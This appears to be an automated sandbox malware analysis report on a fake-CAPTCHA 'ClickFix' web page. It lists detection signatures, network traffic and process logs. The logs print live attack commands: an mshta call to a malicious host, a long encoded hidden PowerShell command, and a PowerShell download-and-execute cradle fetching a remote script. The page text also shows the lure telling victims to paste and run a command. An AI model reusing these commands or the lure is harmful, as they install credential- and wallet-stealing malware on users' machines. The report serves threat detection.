Windows Analysis Report
https://escooterzone.com/play.html

Overview

General Information

Sample URL: https://escooterzone.com/play.html
Analysis ID: 1592165
Infos:

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell Download and Execute IEX
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Phishing site or detected (based on various text indicators)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: https://escooterzone.com/play.html Avira URL Cloud: detection malicious, Label: malware

Phishing
barindex
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 1.0.pages.csv, type: HTML
Source: Yara match File source: 1.1.pages.csv, type: HTML
AI detected suspicious Javascript
Source: 0.0.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://escooterzone.com/play.html... This script demonstrates high-risk behaviors, including dynamic code execution (using `mshta` to potentially run remote scripts) and data exfiltration (copying sensitive information to the clipboard). The script also creates a fake reCAPTCHA popup, which could be part of a phishing attempt. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score.
Phishing site or detected (based on various text indicators)
Source: Chrome DOM: 1.0 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
Source: Chrome DOM: 1.1 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm nat a robat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
Source: https://escooterzone.com/play.html HTTP Parser: No favicon
Source: https://escooterzone.com/play.html HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.17:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.151.250:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.108.8.254:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.17:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: global traffic DNS traffic detected: DNS query: escooterzone.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: agiledeals.shop
Source: global traffic DNS traffic detected: DNS query: e1.foiloverturnarrival.shop
Source: global traffic DNS traffic detected: DNS query: veilyspen.shop
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.17:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.151.250:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.108.8.254:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.17:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49753 version: TLS 1.2
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Very long command line found
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 10314
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 10314
Source: classification engine Classification label: mal100.phis.spyw.evad.win@26/11@12/207
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eieldnfk.kk3.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: HandleInformation
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\svchost.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://escooterzone.com/play.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: unknown Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://agiledeals.shop/s6.pdf # ? ''I am not a robot - reCAPTCHA Verification ID: 2165
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAU